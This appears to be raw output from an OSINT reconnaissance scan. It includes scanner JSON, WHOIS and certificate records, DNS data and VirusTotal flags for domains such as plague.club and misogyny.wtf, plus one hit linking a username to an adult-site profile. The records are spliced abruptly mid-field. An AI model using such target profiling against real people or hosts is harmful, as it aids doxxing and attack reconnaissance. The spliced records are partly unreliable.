u'6d1f2e7c9ee98731735c0f301524bacadf25fc689ab7a3fdceeb7bdb7851d001', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://test.dchidell.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'test.dchidell.com', u'summary': u'Date: Fri, 04 Nov 2022 13:59:02 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Fri, 04 Nov 2022 14:59:02 GMT\r\nLocation: https://test.dchidell.com/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=RoJDd3f5fsjuWB5klGxf3PlyBwXw8IOKUGUFQ2%2BJVDB0oVRQ%2B8%2BjMLE6CEynphqbYQ0aqV%2Bc%2FIIw6bOp0eLfqOqe04shN5U0MD%2BbY1SMZqRKI7EzAj%2BGR0G5t808t0FxpO9ETw%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dde32af1c0bba-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-11-04T13:59:02.799770114Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc77d91c524d2a9533d811392662', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'301 Moved Permanently', u'url': u'', u'header': {u'location': u'https://duckduckgo.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.bnty.cc', u'bnty.cc'], u'cn': u'*.bnty.cc', u'valid': True, u'not_after': u'2023-02-02T12:57:37Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'333d13bbb125ca81d56c1dfa8508fa154f11e289fd68c3423e58be8d9eea22b5', u'key_algo': u'ECDSA', u'not_before': u'2022-11-04T12:57:38Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'bnty.cc', u'summary': u'Date: Fri, 04 Nov 2022 13:59:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nLocation: https://duckduckgo.com/\r\nPermissions-Policy: interest-cohort=()\r\nContent-Security-Policy: default-src \'none\' ; connect-src https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; manifest-src https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; media-src https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; script-src blob: https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ \'unsafe-inline\' \'unsafe-eval\' ; font-src data: https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; img-src data: https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; style-src https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ \'unsafe-inline\' ; object-src \'none\' ; worker-src blob: ; child-src blob: https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; frame-src blob: https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; form-action https://duckduckgo.com https://*.duckduckgo.com https://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion/ ; frame-ancestors \'self\' ; base-uri \'self\' ; block-all-mixed-content ;\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1;mode=block\r\nX-Content-Type-Options: nosniff\r\nReferrer-Policy: origin\r\nExpect-CT: max-age=0\r\nExpires: Sat, 04 Nov 2023 13:59:02 GMT\r\nCache-Control: max-age=31536000\r\nX-DuckDuckGo-Locale: en_US\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WhCBu%2F7vZPBwdh6Ds1Iv04iqoNUqAvmYyNuXdvfAVvaV5b8kgGRWOjkk3IhaHAJkA6wpbWwrt2wqvmQcUuX6M4JX%2BmhVDewz%2ByZewI06QkfquV5isBpzZnAK"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dde2fba607260-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 301 Moved Permanently\n\na2\r\n\r\n301 Moved Permanently\r\n\r\n

301 Moved Permanently

\r\n
nginx
\r\n\r\n\r\n\r\n0\r\n\r\n', u'time': u'2022-11-04T13:59:02.100271198Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf13715639052f57e58 188.114.97.3 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:04:09:0C) 37.780462,-122.390564 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None knottyshrillwireframes.bienlineagts.repl.co 34.149.204.188 2022-12-18 00:23:30 Raw DNS Records No DNS Raw Records 0 0 2 0 None ftp.zerotwo-best-waifu.online. 577 IN CNAME zerotwo-best-waifu.online. ftp.zerotwo-best-waifu.online 2022-12-18 00:03:10 Co-Hosted Site - Domain Name No SSL Certificate Analyzer 0 0 1 0 None webapps.net zerotwo-best-waifu.online 2022-12-18 00:06:44 Open TCP Port No Pulsedive 0 0 2 0 None 104.21.19.243:8080 104.21.19.243 2022-12-18 00:05:48 Raw Data from RIRs No Certificate Transparency 1 0 1 0 None [{u'not_after': u'2022-12-19T21:18:05', u'not_before': u'2022-09-20T21:18:06', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'00f4f0fa2fab28c37d0eb0025f9f06b10c', u'entry_timestamp': u'2022-09-20T22:18:07.22', u'id': 7584290631}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.772', u'id': 7588954405}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.442', u'id': 7584197572}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:29.495', u'id': 7186449707}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:28.726', u'id': 7185452708}, {u'not_after': u'2022-10-21T20:45:09', u'not_before': u'2022-07-23T20:45:10', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'392fd3a5c8f5abd1137069a51df6ba07', u'entry_timestamp': u'2022-07-23T21:45:11.265', u'id': 7185973399}] misogyny.wtf 2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b1357a3bc72c05-ORD Content-Encoding: gzip 188.114.97.0 2022-12-18 00:31:08 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-20T06:18:36Z Creation Date: 2020-04-14T23:55:11Z Registry Expiry Date: 2023-04-14T23:55:11Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. Domain name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-15T06:18:37.01Z Creation Date: 2020-04-14T23:55:11.78Z Registrar Registration Expiration Date: 2023-04-14T23:55:11.78Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T12:31:04.11Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:31:49 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: PLAGUE.ONLINE Registry Domain ID: D209164753-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-12-16T12:58:58.0Z Creation Date: 2020-11-15T10:10:12.0Z Registry Expiry Date: 2023-11-15T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET Name Server: NS1.MYHOSTADMIN.NET Name Server: NS2.MYHOSTADMIN.NET Name Server: NS3.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:46.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.online Registry Domain ID: zdns-xyz52160522 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-11-15T10:10:12.0Z Creation Date: 2020-11-15T10:10:12.0Z Registrar Registration Expiration Date: 2023-11-15T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.online Name Server: ns1.myhostadmin.net Name Server: ns2.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:48.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en plague.online 2022-12-18 00:51:57 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.54] https://www.virustotal.com/en/ip-address/188.114.96.54/information/ 188.114.96.0/24 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None XVIDEOS-profiles (Category: XXXPORNXXX) https://www.xvideos.com/profiles/rasputain rasputain 2022-12-18 00:22:01 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b1f5531bc02c54-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2a06:98c1:3121::1 2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b334585a3ee180-ORD Content-Encoding: gzip 188.114.96.0 2022-12-18 00:20:59 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2699f7f992d88-ORD Content-Encoding: gzip 2606:4700:3033::6815:1cf0 2022-12-18 00:03:35 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3240.webapps.net 81.88.52.240 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 134 0 1 0 None 172.67.147.230 plague.fun 2022-12-18 00:09:31 Physical Location No LeakIX 0 0 2 0 None United States 172.67.169.215 2022-12-18 00:08:28 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.222:80 81.88.52.222 2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None auroramediagroup.xyz 172.67.147.230 2022-12-18 00:18:27 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [188.114.96.1] https://www.virustotal.com/en/ip-address/188.114.96.1/information/ 188.114.96.1 2022-12-18 00:09:46 Co-Hosted Site No HackerTarget 0 0 2 0 None atmospherecomm.store 172.67.147.230 2022-12-18 00:16:35 Physical Location No numverify 0 0 3 0 None IS +3544212434 2022-12-18 00:13:15 Affiliate Description - Category No DuckDuckGo 0 0 2 0 None Technology companies based in the San Francisco Bay Area garrett.ns.cloudflare.com 2022-12-18 00:25:26 Physical Location No MetaDefender 0 0 2 0 None Burt, United States 172.67.147.230 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.3 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward5.registrar-servers.com misogyny.wtf 2022-12-18 00:32:11 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.tech plague.fun 2022-12-18 00:03:04 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.107 90.116.166.104 2022-12-18 00:10:04 Linked URL - Internal No URLScan.io 0 0 1 0 None http://misogyny.wtf:2020/parser misogyny.wtf 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 1 0 1 0 None eforward5.registrar-servers.com misogyny.wtf 2022-12-18 00:08:56 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.96.0', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940b24488fe22fafc8fabe4d547cbebe6bbcbebe6bb0974cd4f', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'400 The plain HTTP request was sent to HTTPS port', u'url': u'', u'header': {u'content-length': u'655', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'literaryscout.co.uk', u'summary': u'Server: cloudflare\r\nDate: Thu, 03 Nov 2022 17:03:57 GMT\r\nContent-Type: text/html\r\nContent-Length: 655\r\nConnection: close\r\nCF-RAY: -\r\n\nPage title: 400 The plain HTTP request was sent to HTTPS port\n\n\r\n400 The plain HTTP request was sent to HTTPS port\r\n\r\n

400 Bad Request

\r\n
The plain HTTP request was sent to HTTPS port
\r\n
cloudflare
